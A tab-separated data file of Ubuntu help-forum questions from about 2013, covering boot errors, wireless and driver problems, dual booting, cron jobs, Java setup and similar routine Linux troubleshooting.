321277	how do i recover from a read dma bootup error ?	i am running 12.04 lts , and almost every time i shut down my system , my root fails to mount on the next bootup , usually after an update . in this particular case , i can see my filesystem when running on live cd , but every time i boot , i see the following sequence of messages cycle in an endless loop ( process ids removed ) : ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 ata1.00 : bmdma stat 0x24 ata1.00 : failed command : read dma ata1.00 : cmd c8/00:08 : b0 : f7:46/00:00:00:00:00/e0 res 51/40:08 : b0 : f7:46/40:02:02:00:00/e0 emask 0x9 ( media error ) ata1.00 : status : { drdy err } ata1.00 : error : { unc } end_request : i/o error , dev sda , sector 4650928 i boot off of a relatively new 60gb solid state disk drive , and in the past when i have run into this issue , i use fsck to detect and fix errors . but fsck runs clean on my partition , so i am uncertain how to approach the problem .
321279	computer freezes when plugging in monitor via hdmi	i 'm really sorry for this , because i 've seen quite a few different posts about this , but none of them seem to solve my issue . i have a relatively old sony laptop , running ubuntu 13.04 , with the `` mobile intel速 gm45 express chipset x86/mmx/sse2 '' driver . when i plug in my external monitor ( samsung syncmaster t240 ) via hdmi , the laptop freezes entirely . i ca n't move the mouse and keyboard is unresponsive . the only thing i can do is a hard shut down . any help appreciated .
321281	netflix install issue	i know this has been dealt with extensively but i have an issue i can not find an answer for . i am trying to install the netflix desktop app and in the terminal after entering the last step `` sudo apt-get install netflix-desktop '' i get an error that says `` unable to locate package netflix-desktop '' i would really appreciate some help , thanks , john
321283	making the whole filesystem accessible over webdav	i have a server which runs ubuntu 13.04 and i want to access it using webdav ( as sshfs is too slow , and security isn’t that important in my case ) . i tried setting it up with apache , but it didn’t work because apache user , www-data , doesn’t have root privileges needed for accessing everything . and apache refused to run as root either . what can i do to solve this ? i would much prefer not complicating matters by switching to nfs or samba through a vpn . it’s just a small cheap server after all .
321284	unable to connect to wireless on 13.04	network manager can see my home network and says strength is ok or even good , but wo n't connect . sometimes it asks for my password repeatedly but usually it just tries to connect for a bit and then gives the `` disconnected -- you are now offline '' message . other computers have no problem connecting , and my computer has no problem connecting to other networks . i 've tried : turning the router off and on again turning the computer off and on again deleting the connection information , stopping and restarting network manager , and re entering the information as if it were a new connection deleting the connection , rebooting , adding it again making sure the password is correct toggling settings like `` available to all users '' and `` connect automatically '' edit : adding the line blacklist acer_wmi to the file blacklist.conf , as in this answer ... and none of these have helped . edit 2 i do n't currently have access to my router via ethernet cable , so doing route -n from my command line is n't possible right now . i am using a mac that has no trouble connecting to the internet , so following the accepted answer at http : //stackoverflow.com/questions/6782658/how-to-get-default-gateway-in-mac-osx , i ran route -n get default from the mac . does that give the required information ? the output was $ route -n get default route to : default destination : default mask : default gateway : 192.168.1.1 interface : en1 flags : < up , gateway , done , static , prcloning > recvpipe sendpipe ssthresh rtt , msec rttvar hopcount mtu expire 0 0 0 0 0 0 1500 0 i 've been using this network for several months , and this problem seems to come up every couple of weeks , lasting a couple of days at a time , and suddenly start working again for no discernible reason . some outputs of the commands that might be relevant : the output of iwconfig was eth0 no wireless extensions lo no wireless extensions wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : on the output of lspci was : ~ $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.7 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 8 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 06 ) 09:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 0b:00.0 usb controller : texas instruments tusb73x0 superspeed usb 3.0 xhci host controller ( rev 02 ) any ideas ? any further information i should provide ?
321286	computer wo n't boot after installing updates	i am a novice user . after installing the latest updates a couple of days ago , how do i get computer to boot up ? all i get is the following message : gnu grub version 1.99-21ubuntu3.9 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > _
321289	ubuntu brainstorm site down/dead ?	is http : //brainstorm.ubuntu.com dead ? i get redirected to http : //community.ubuntu.com/ ? other references are dead as well . https : //wiki.ubuntu.com/brainstorm/ this mailing list suggest the closure in may 2013 : https : //lists.ubuntu.com/archives/ubuntu-devel/2013-may/037100.html but i could n't find any official note . please enlighten me : - )
321302	xubuntu live usb persistence - how to ?	i 'm using xubuntu 13.04 from live usb . i know that in order to be able to keep files/settings/etc after restart , usb live disk should be created with some storage reserved . however since i got this usb from a friend who created installation , i do n't know if he reserved any space , and so my questions are : how can i find out amount of space reserved ( if any ) ? if no space is reserved , can i manually chose usb/hdd location to store my settings in order to be able to boot into them the next time i log on ? i 'm currently running a very long session and it would help me if i could somehow be able to store my settings ( firefox , apt-gets , xrandr screen conf . ... ) to not have to do it again after i reboot . thanks , ir
321304	get-iplayer stopped working	get-iplayer is a really handy script that lets you download bbc programs so you can watch them later . recently it 's just stopped fetching programs , emitting errors like : error : rtmp_readpacket , failed to read rtmp packet header info : command exit code 1 ( raw code = 256 ) is this the end of it or is there a fix/update ? i 'm on precise lts so the package is probably not the latest .
321307	how can i get newer boost packages than my distro 's repos contain ?	i 'm developing on a system that 's running lucid 10.04.4 lts . i ca n't do a complete release upgrade in order to get access to newer packages , although i do have sudo so i can otherwise muck about as needed , as long as i do n't change the release version or kernel . with lucid 's repos , including backports , i can only get boost 1.40 packages . i need a feature from a newer version of boost ( i think - i 'm trying to find a workaround in parallel with this questions ) , but i 'd really like to avoid installing from source because that can turn into a rabbit hole ... especially since newer packages do exist ; just not in the standard lucid repos . is there a repo somewhere i could connect to and get newer boost packages ? ( basically , i 'm looking for a backport , but one that does n't appear in the official lucid backports ... )
321321	how to enable pm_debug ?	i have read that one should set pm_debug=true in /usr/lib/pm-utils/pm-functions to get more debugging details in /var/log/pm-powersave.log at least in ubuntu 13.04 , /usr/lib/pm-utils/pm-functions contains : [ `` $ { pm_debug } '' = `` true '' ] & & { export pm_debug set -x } i 'm not wearing my programmer hat today . is is set to true or not ?
321322	trying to compile code results in error : make [ 1 ] : g++-3 : command not found	i am trying to compile a program on ubuntu 12.04 ( lts ) , but the following error keeps resulting : evensteven @ pc : ~/desktop/mimocomplexldpc $ make all cd ./src ; make ; make [ 1 ] : entering directory `/home/evensteven/desktop/mimocomplexldpc/src' g++-3 -wall -dmv_vector_bounds_check -g '-dcomplex=complex < double > ' -include ostream.h -wno-deprecated -fpermissive -i../include -i../mv/include -c compcol_double.cc make [ 1 ] : g++-3 : command not found make [ 1 ] : *** [ compcol_double.o ] error 127 make [ 1 ] : leaving directory `/home/evensteven/desktop/mimocomplexldpc/src' make : *** [ sp ] error 2 at first , i figured it was n't finding the g++-3 compiler , so i looked , and saw that it was not installed . i went ahead and installed it , as seen below : evensteven @ pc : ~ $ dpkg -l | grep gcc ii gcc 4:4.6.3-1ubuntu5 gnu c compiler ii gcc-3.3 1:3.3.6-15ubuntu6 the gnu c compiler ii gcc-3.3-base 1:3.3.6-15ubuntu6 the gnu compiler collection ( base package ) ii gcc-3.4 3.4.6-6ubuntu5 the gnu c compiler ii gcc-3.4-base 3.4.6-6ubuntu5 the gnu compiler collection ( base package ) ii gcc-4.6 4.6.3-1ubuntu5 gnu c compiler ii gcc-4.6-base 4.6.3-1ubuntu5 gcc , the gnu compiler collection ( base package ) ii libgcc1 1:4.6.3-1ubuntu5 gcc support library evensteven @ pc : ~ $ dpkg -l | grep g++ ii g++ 4:4.6.3-1ubuntu5 gnu c++ compiler ii g++-3.3 1:3.3.6-15ubuntu6 the gnu c++ compiler ii g++-3.4 3.4.6-6ubuntu5 the gnu c++ compiler ii g++-4.6 4.6.3-1ubuntu5 gnu c++ compiler even with these changes , the same error as above results . i took a look at the makefile.def file and saw that it was calling gcc-3 and g++-3 specifically : # g++ v. 2.6.3 # ccc = g++-3 # ccc = g++ cc = gcc-3 # cc = gcc changing the makefile.def so that gcc-3 and g++-3 read gcc-3.3 and g++-3.3 ( or gcc-3.4 or g++-3.4 for that matter ) , the following error occurs : in file included from /usr/include/c++/3.3/iosfwd:48 , from /usr/include/c++/3.3/ios:44 , from /usr/include/c++/3.3/ostream:45 , from /usr/include/c++/3.3/iostream:45 , from /usr/include/c++/3.3/backward/iostream.h:32 , from /usr/include/c++/3.3/backward/ostream.h:32 , from < command line > :8 : /usr/include/c++/3.3/bits/stringfwd.h:54 : error : syntax error before ` < ' token /usr/include/c++/3.3/bits/stringfwd.h:58 : error : explicit specialization in non-namespace scope `int toupper_l ( ... ) ' /usr/lib/gcc-lib/i486-linux-gnu/3.3.6/include/stddef.h:151 : confused by earlier errors , bailing out make [ 1 ] : *** [ compcol_double.o ] error 1 make [ 1 ] : leaving directory `/home/evensteven/desktop/mimocomplexldpc/src' make : *** [ sp ] error 2 any idea what may be causing these errors ? thank you in advanced for helping .
321323	unity webapps installation failure for chromium	i am running kubuntu 13.04 on an hp pavillion elite hpe 240f with a 64 bit amd64 processor . it is a dual-boot configuration with windows 8.1 preview . i use chromium as my default browser in linux . on virtually every page i go to , i get a notification to install unity webapps plugin . if i click install plug-in it downloads a file into my ~/downloads directory . i get a box asking me to discard or keep . no matter what i select , nothing happens . i have dozens of copies of this file now . if i select problems installing ? from the notification bar , it takes me to a web page i ca n't use . i have closed and restarted chromium dozens of times to no avail . i continue to be pestered by this notification bar . i need to get this either installed or removed , i do n't care which .
321324	linux copying to usb flash drive `` no space left on device ''	i have a new usb flash drive , 16gb . i am trying to copy a folder from my local drive to this flash drive . the folder i am trying to copy contains about 225000 4kb files . i have tried to copy using the folder gui and with terminal . both times it copies exactly 21844 files and then i get the error : '' can not create regular file `filename ' : no space left on device '' i also have a compressed copy of the files and i have tried extracting this directly into the usb drive , again stopping after 21844 files . i have looked for possible solutions and tried emptying the trash but that does not solve the issue . i have also formatted the drive to fat32 and tried again , but that does n't work . does anyone have any suggestions ? i am running ubuntu 12.04 and the usb drive is an adata s107 .
321326	all of my video is going fast , and has no sound	movie player , blender , youtube and vimeo on chorme . everything i try to play on my system has this issue . the videos play very fast , and have no sound at all . i just did an update , can i undo it ? should i ? i 'm using ubuntu 13.04 , and i just did the regular update when prompted . added : grooveshark does n't play , so it seems i have no sound at all .
321329	apt-get packages automatically installed ( by what ? ! ) and can be removed ( but i need them ! )	apt-get is prompting me to remove these packages since they were automatically installed but are no longer required : libcapi20-3 libgif4 : i386 libnss-winbind libp11-kit-gnome-keyring : i386 libpam-winbind ttf-droid ttf-liberation ttf-umefont ttf-unfonts-core winbind wine wine-gecko1.4 wine-gecko1.4 : i386 wine1.4 wine1.4-amd64 wine1.4-i386 : i386 winetricks i 'm not sure , but wine was installed as a playonlinux dependency . i 'm obviously using playonlinux and it is currently installed , so either playonlinux package has messed up dependencies or something else happened . i could quickly mark wine as manually installed , so apt wo n't ask me to delete it , but i want to know which packages are no longer requiring these dependencies . is there any satanic ritual i can use to achieve this ? thank you so much in advance !
321331	patching kernel for graphics tablet , not sure if it 'll work	i just got a new graphics tablet that seems to be supported in kernel 3.11 , found this : https : //patchwork.kernel.org/patch/2624521/ i downloaded the new kernel deb packages from here http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.11-rc1-saucy/ and installed them but apparently nvidia does n't have drivers for 3.11 yet ( nor 3.10 ) so i had to revert back to 3.8 . now my question is , can i just follow instructions here https : //help.ubuntu.com/community/kernel/compile , and apply that patch to my current kernel in ubuntu 13.04 or is there any other way i can get this working with no headaches ?
321334	how to see what technologies a video card supports	i am looking for a way to check if a video card supports a technology . either using an open source driver or a proprietary one , how can i check to see what video technologies a video card can handle . for example : pixel shader version opengl version opengl es version hdmi / dvi/ vga output gpu speed amount of memory ( either on cpu , board or pcie card ) any other characteristics and video technologies that can be extracted from the video card . for example , i have 2 computers . one has an intel cpu with hd4000 using the open source drivers . the other one has an nvidia 560 ti video card using the 325 nvidia proprietary drivers . how can i see the mentioned characteristics for each of them .
321335	dual booting problems	okay so i decided earlier today to try out ubuntu , i didnt want to get rid of windows as i still have games i want to play so i decided to dual boot . i made a livecd from a thumb drive and instaleed ubuntu on my harddrive . i had shrunk the windows partition to make space for ubuntu . i finished installing ubuntu and it works beautifully and i really like it . when i tried a while ago to start up windows 7 through the grub , it says the following bootmcr image is corrupt . the system can not boot . i honestly have no idea what to do , any help would be appreciated .
321337	update manager getting errors	i recently installed chrubuntu onto my acer c7 chromebook . i tried running the update manager from the terminal and i keep getting the same message e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . someone help me , i 'm so new to ubuntu .
321338	move wireless passwords to another computer	i am going to reinstall ubuntu soon and want to move my wireless passwords i have to the new installation . what do i need to backup to put on the new installation ?
321344	upgrade ubuntu to 13.04 from 12.10 on dual-boot laptop	is there a possibility to upgrade from 12.10 to 13.04 ? i booted from the 13.04 installation cd but i could n't do the upgrade ( no upgrade option was displayed ) . i have a laptop with a windows 7 dual-boot . thanks ...
321345	hd is seen in busybox but not in the live usb	i 'm a victim of an infamous problem with wubi and i might be about to lose all my data . but that 's not my question . the problem is that whenever i try to at least backup some of my files by booting via a live usb ( lubuntu 13.04 , specifically ) , i am almost never able to see my hd . on the other hand , if i simply boot via hd - and therefore crash right away and am led to busybox - i do see some objects in /dev , namely /dev/sda1 /dev/sda2 /dev/sda5 , which lets me hope that at least i am not suffering from a simultaneous hd failure . so my question is : how can i get into one of those partitions ? busybox wo n't let me mount them , of course . i am not even able to re-install lubuntu , since under the live installation i can not see any hd where the system can be saved . so i am completely stuck . ps gparted on the live usb does not see any hd , either .
321348	how to bypass the text lenght limit of friends app ?	when posting new message , the limit of 140 character is still applied . i cannnot exceed the limit . does somebody know how to override this limit ?
321350	can not set classpath	i 'm using the command `` java -cp /home/ubuntu/myapp '' to set the command to the directory where mu app 's classes are located . however i seem to be having no luck . the terminal simply answers by giving me a list of possible java commands - which funnily enough include `` -cp '' . how do i get ubuntu to take me seriously and actually do what i tell him ?
321356	how do i install ubuntu on a fresh computer	the computer has no os and i am currently trying to boot from a usb stick . it says that it is invalid . the usb has 13.04 on it . thank you for the help .
321361	why is my pcie nic disabled ?	i 've installed a card with two intel 82576 ethernet ports into my pcie expansion slot . i 'm running ubuntu server 13.04 amd64 with the 3.10 generic stable kernel . when i run lspci | grep ethernet i get the response : 00:19.0 ethernet controller : intel corporation ethernet connection i217-v ( rev 04 ) 01:00.0 ethernet controller : intel corporation 82576 gigabit network connection ( rev 01 ) 01:00.1 ethernet controller : intel corporation 82576 gigabit network connection ( rev 01 ) ethernet controller : intel corporation ethernet connection i217-v is the onboard port , and its working just fine . the other two ports are the ones on the expension card . when i run lshw -class network the response tells me that the two ethernet ports in question are disabled . the configuration sub-section for the intel 82576 ports show : configuration : autonegotiation=on broadcast=yes driver=igb driverversion=5.0.3-k firmware=1.80 , 0x61520001 latency=0 link=no multicast=yes port=twisted pair i have a cable plugged into one of the ports on the card , and i 'm able to see connectivity leds blinking away during bios post . when i open /etc/udev/rules.d/70-persistent-net.rulesit shows only the on board ethernet interface and neither of the interfaces on the expansion card . i was using this card in a previous machine that was also running ubuntu server 13.04 and i was able to light it up without and problems . how do i enable my nic ?
321362	how does dpkg-reconfigure know which category an application belongs to ?	when i run the command sudo dpkg-reconfigure lightdm , i 'm taken to a screen that allows me to customize which display manager i want to use . it lists lightdm , gdm , and other display managers i have installed . i have n't used this command for other things , but i assume it lets you configure other categories of packages as well . how does dpkg-reconfigure know what applications are display managers ( or any other category you 're configuring ) and which are n't ? if there is some categorization going on behind the scenes with apt-get , i 'd like to know about it , and how i can view these categories .
321363	safe to install lubuntu from livecd after force-quitting `` check disk for defects '' routine ?	i burnt a lubuntu-13.04-desktop-i386.iso disk image to a livecd ( after having successfully checked the md5 hashes of the .iso ) using disk utility in mac osx . i want to install lubuntu on an older laptop i have ( hp pavilion with amd turion 64 x2 processor , 1g of ram which is why i chose lubuntu , windows vista currently installed ) . i have successfully booted to the livecd , and i wanted to check that the install cd did n't have any errors , so i chose the `` check disk for defects '' option . it has now been running this process for over an hour , and i am trying to get a gauge of how long this process should take . i ca n't hear the cd/dvd drive running anymore , so i assume nothing else is being read from the disk , leading me to think that something has become hung up . update : based on the first comments below , something was obviously wrong with the `` check disk for defects '' process , so i force quit using ctrl-c ( this restarted the computer ) . i then just tried the `` use lubuntu without installing '' option , and got to the gui just fine . now the question becomes , is it safe to actually install lubuntu given that i had to quit the disk checking process ?
321370	why is my webcam not detected on my dell e6400 ?	my webcam is not detected on my dell e6400 laptop . neither skype , nor cheese , nor camora detects it . it is turned on in the cmos , but lsusb does n't see it .
321373	how to run program as a different user	i 'm trying to launch programs as a different user than what i 'm logged in as . for testing i 've been using gedit . when i type sudo -u app_restricted gedit , i get an error , app_restricted being the username of the other user account . the user account in question has limited permissions . error message : no protocol specified ( gedit:2139 ) : gtk-warning ** : can not open display : :0.0 system details : ubuntu 10.10 - desktop x86-64 with kernel 3.9 ( from raring ) ps : i 've also tried su -u , and gksu -u but they do n't work either .
321374	i use hathaway as isp . can not login without internet explorer to lan	i live in bangalore india . my isp is hathaway on windows internet explorer , my isp redirects me first to their homepage and i need to login . after that i can use internet without any issues but on ubuntu i do not have ie . and it does not redirect with anything else what can i do ?
321377	user account password . stuck in guest forever ?	so , the thing is i created a new admin account , deleted the old one , but pressed `` lock '' before setting a password for it . now i try to unlock it and it asks me for a password i 've never set . i did this while in a guest session . ideas ?
321380	incorrect encoding in skype input	recently i find out that text input field in my skype is encoded in cp1252 instead of utf8 ( which i presume is default for ubuntu now ) . as seen there no other part of interface was corrupted and all other utilities also seems to be fine . can you please advice me ? ubuntu 13.04 kernel 3.9.1-pf # 16 x86_64 gnu/linux skype 4.2.0.11 olloff @ olloffs : ~ locale lang=ru_ru.utf-8 language=ru : en lc_all= update : seems to be , problem relates input only . if i paste copied cyrillic text to input field it shows correctly .
321381	update not working	please help me to find solution for my ubuntu update while i using apt-get update command , then error display as follows : err http : //archive.ubuntu.com precise-updates/universe sources unable to connect to archive.ubuntu.com : http : [ ip : 91.189.91.14 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . please give some solution for me . thanks for all !
321382	which drivers should i install ?	i 'm currently using catalyst 13.4 on dell 1749 i3 ( gpu : ati5650 ) but last time i saw in the window of `` sotware and updates '' , that there are new : i checked them out . i used early catalyst 13.4 and they were n't bad , but i would like to have newest drivers . so , which driver should i use ?
321383	got 2,919 pb/s in ubuntu terminal	i have problem ( seems to be trivia ) about ubuntu terminal . once my network connection slow down then it ( sometimes but very rare to happened ) showed some information like this . i shocked because i have been got 2,919 pb/s . sorry my mouse block some part of letter 'p ' ( i actually rush to print screen ) but i believe you can recognize it . edit based on answer given to me , and i got similar info then , i 'd like to add more clearly new image after . can someone explain it to me ? best regards !
321395	why is my unity missing after installing proprietary driver ?	after installing the proprietary driver for my a10-5800k apu from the amd website , unity disappeared . to make things worse , i can not input any key commands into the terminal ( can only copy/paste , but not run script ) ! not only that , but the panels on many windows are missing . i 'm currently running 12.10
321400	if i install ubuntu to a second hard drive , will it prompt me to select which os to use on startup ?	in my current rig , i have two 1tb hard drives . the first has windows 7 , and the other is empty . if i install ubuntu to the empty one , will it prompt me to select which os i would like to use on start up ?
321401	close lightdm in ubuntu 12.02	should i install original nvidia drivers , for my nvidia 8200 . when i start installation , it asks me to close xserver . only way to close it is use the command : `` sudo service lightdm stop '' , because , desktop manager gdm , is not active in ubuntu 12.02 . the problem is that i do stop lightdm , this give to me a login bug also , when i run the command to stop service lightdm i get a black screen . as i do , to stop xserver , avoiding login bug ?
321402	custom ubuntu iso image with java	i want to build custom ubuntu image ( .iso ) file with jre and my application . i 've already built my application on ubuntu . this ubuntu image i 'm going to build should only run my application.i want a system , that is only capable to run my application . the application should start while the system is starting . where should i look for resources to implement this ? ? thank you .
321403	what programming languages should i learn to become an ubuntu developer ?	although i have used netbeans once for a project , what languages do i need to learn to become a full-fledged ubuntu developer ? my project in netbeans ( java only ) was to design a calculator ( relatively easy ) . moreover , how do we learn to make image viewers , browsers , etc. ? also , what would be the best language for certain applications ?
321414	how do i connect a video camera to an ubuntu laptop ?	i have a panasonic video camera and i want to download movies on my computer . what should i do ?
321416	ubuntu gnome dual screen move all open application to primary screen	finally i have change my work environment at work from windows to ubuntu 12.04 , using gnome 3.4 . i 'm very satisfied , but there is one issue that i 'm trying to resolve for some time without success . most of the time the laptop ( lenovo x230 ) is docked in a docking station and connected to an external monitor , the primary monitor is the external monitor , and the secondary is the monitor of the laptop . but sometimes the laptop is leaving the docking stations - meetings/work on the train/etc , when the laptop is docked back to the docking station all the open applications stay at the secondary screen and i need to drag manually all applications to the primary screen . output of : xrandr -q : lvds1 connected 1366x768+1920+0 ( normal left inverted right x axis y axis ) 277mm x 156mm 1366x768 60.1*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) hdmi3 disconnected ( normal left inverted right x axis y axis ) dp2 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1920x1080 60.0 1600x1200 60.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dp3 disconnected ( normal left inverted right x axis y axis ) in addition i have installed : https : //extensions.gnome.org/extension/484/workspace-grid/ and followed : http : //gregcor.com/2011/05/07/fix-dual-monitors-in-gnome-3-aka-my-workspaces-are-broken/ but with no use , still i drag all applications manually to the primary screen on docking . is there a utility/script/command to move all open applications to the primary screen ? thanks for the help .
321417	crontab wo n't execute vlc live stream	im trying to auto start and stop a rtps stream via vlc in the crontab : sudo crontab -e 15 9 * * * vlc -vvv rtsp : //user : pwd @ xxx.xxx.xxx : xxx/stream1 and nano /etc/crontab 14 9 * * * camera vlc -vvv rtsp : //admin : tmt01 @ 80.112.134.3:554/stream1 if i paste the command in the terminal , the stream opens without a problem , but when i was testing it by making it a cronjob this way and scheduling it 2 minutes in the future to test it , nothing happens . am i doing something wrong or can anybody help me ?
321418	how do i share folders in xubuntu ?	how do i share folders in xubuntu like in ubuntu ? i found no settings or options to share folders on my network , i do have samba installed . i do n't know what else to try . is there a command that i can try in terminal for xubuntu ? i do see my xubuntu machine from other computers on my network , but shows empty when i access it on other computers . ubuntu is more user friendly for such purpose .
321419	what `` wired connection '' settings do i need to access my access point 's setup page ?	i have a tenda w150m which has a number of functions but i use it as an access point . normally , i use microsoft windows and a lan cable to access the setup page at 192.168.2.1 but i do n't have that computer available now . i am trying to access the setup page at 192.168.2.1 with ubuntu . what `` wired connection '' settings do i need to do this ? edits follow : as far as i know , my ubuntu 12.04 is stock . i do n't mess with comm . configs generally . i recall that sometimes windows 7 with internet explorer gets to 192.168.2.1 with a stock config but i 've also experienced one occasion where i had to tweak a stock windows 7 a bit but i do n't remember what the tweak was . issuing this command cat /etc/network/interfaces produces this output : auto lo iface lo inet loopback issuing this command : ifconfig ; route -n produces this output : eth0 link encap : ethernet hwaddr e8:03:9a:08 : d7:9b inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :ea03:9aff : fe08 : d79b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:81012 errors:0 dropped:0 overruns:0 frame:0 tx packets:84117 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:92583272 ( 92.5 mb ) tx bytes:10290944 ( 10.2 mb ) interrupt:50 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:11244 errors:0 dropped:0 overruns:0 frame:0 tx packets:11244 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1040726 ( 1.0 mb ) tx bytes:1040726 ( 1.0 mb ) kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 the config listed here works in that the telco 's dsl modem lan drop allows ubuntu to access the internet . the same config will not work when the lan cable goes to the tenda w150m using chrome to browse 192.168.2.1 . if it 's not obvious : the intention is to use the telco 's dsl modem lan drop to broadcast wifi because the wireless signal from the telco 's dsl modem is weak at my preferred location . edit i found the solution for windows 7 , as a youtube video , but i do n't know how to do this in ubuntu . http : //www.youtube.com/watch ? v=bkd9zhlwhmy warning : the video is more than 5 minutes long !
321422	how to setup java-home and path in ubuntu 12.04	we are new to ubuntu.recently we changed my server os to ubuntu 12.04 from windows 7 . every one have their own login details . one of my college installed open-jdk7 . i asked him , where you installed java , then he suggested to switch the following directory su root cd /usr/lib/jvm totally 3 folders are there in jvm folder . names are . java-1.7.0-openjdk-amd64 java-7-openjdk-amd64 java-7-openjdk-common generally , if you install java in windows , we will get 2 folder . 1 folder is for jdkand another points to jre . but , in ubuntu we have 3 folders . is it right ? for my conformation , whether he installed correctly or not . i open terminal . i run the following 2 commands javac java -version both commands are working fine . now i want to set-up java-home and path for all users at same place.because everyone is working on application server . can anyone explain step-by-step . thanks .
321425	laptop fan too noisy and fast	i 'm new to the ubuntu desktop . the main reason for my question is that i have a dell latitud e 6420 , and the fan is too fast and noisy or too slow . i have already read about pwm config , but i would like something more automated , because iâm afraid i might screw up . i 'm running ubuntu 12.04 lts . i have already followed the instruction for the sensors , but it did n't change much , i did n't have this problem with windows but i hope somebody can help .
321432	how can i automatically log into a fully encrypted ubuntu system without a password prompt ?	i 've recently installed ubuntu with a full disk encryption which means i have to enter a password at boot to get the system up and running . this is excellent and exactly what i want for the future . right now though , as i am installing software , i would like to temporarily turn of the password request , having the system boot automatically . i know this defeats the point of encryption , but i am getting tired of having to connect an external monitor everytime i reboot . i 'd prefer to , for the time being , to be able to reboot the encrypted system via ssh . once all the software i require is in place , i plan to bring the password request back . anybody know how i do this ?
321435	i can not boot to ubuntu	i installed ubuntu 12.04 to its own hard drive partition . but it simply will not boot to ubuntu . this is the 4th operating system i have on this computer , so i am used to booting to different oss . but when i choose the drive that ubuntu is on , it just bypasses it and asks which windows os i want to choose ? any help please ?
321443	is it possible to open everything in a unity drawer by a keyboard shortcut ?	i have started using drawers . i have a drawer that contains dragged and dropped files . i want to open everything in the drawer via a shortcut key . is this possible ? i tried to select all items in the drawer , but i could not . if it were possible , i would hit enter to launch all items in the drawer .
321444	why is the web preview in geany slow to load ?	i hope it 's okay to ask questions about geany here ... i see there 's a geany tag , but i do n't know if there are any restrictions on what kind of questions are acceptable . i just tried using geany today for css editing because it was recommended here on askubuntu . it is pretty cool and with the `` web preview '' plugin , it gives me the real time css preview that i was hoping for . but , it 's been frustrating me because when i save the css or html file i am working on , it takes a long time to load . a `` long time '' in this context is something like 5 seconds , which gets very aggravating when you are making changes and saving files rapidly in order to compare and contrast different css settings . is there a setting or something i can change to reduce or remove this lag ? is it a settings issue or just a bug ?
321447	how can i fix deja dup hanging on restore ?	i messed up with git and did hard reset ( accidentally ) and my effort to cancel it ( from cl ide ) failed so my code is gone . thank god today deja dup did a backup ( although it did not finish as i told to go on later ) . so i tried to restore from ubuntu one and it shows me the dates and i select today then it checks things and start the restore and hangs there . it presents no error , no message just restoring . i dont know what to do . the dates are not found in ubuntu one so i do n't know where does this deja dup get the from . i do n't know what to do as for now ubuntu one shot is this ( no 18/07/2013 )
321452	how to get rid of this nonsense pop-up appearing in ubuntu while using chromium browser ?	i am using ubuntu in a public location where dozens of users come and visit a site and then go , so for each customer it opens google.com and when they are done , it restarts chromium by killing it first . now , everytime , i get this ugly nonsense pop-up appearing to restore which make no sense in my use case . how to get rid of this ugly pop-up appears all the time in ubuntu ? is there any command line or settings to completely kill this restore nonsense ?
321457	boot updated kernel image on beagleboard	i had installed a kernel on beagle-board to update image of kernel on to it . i have used command sudo apt-get install linux-image-3.2.0.49-omap it installed the kernel on beagle-board it also generate initrd image for this version but it did n't generate a uimage and zimage . actually i want to boot this kernel on beagle-board . can anybody give me some steps showing how to boot a new kernel which is recently installed on beagle-board , but does n't get booted on power on . or if it does n't generate any kind of uimage , how to make it bootable . related information : board -- -- > beagle-board xm port os -- > linux ubuntu 12.04.1 lts
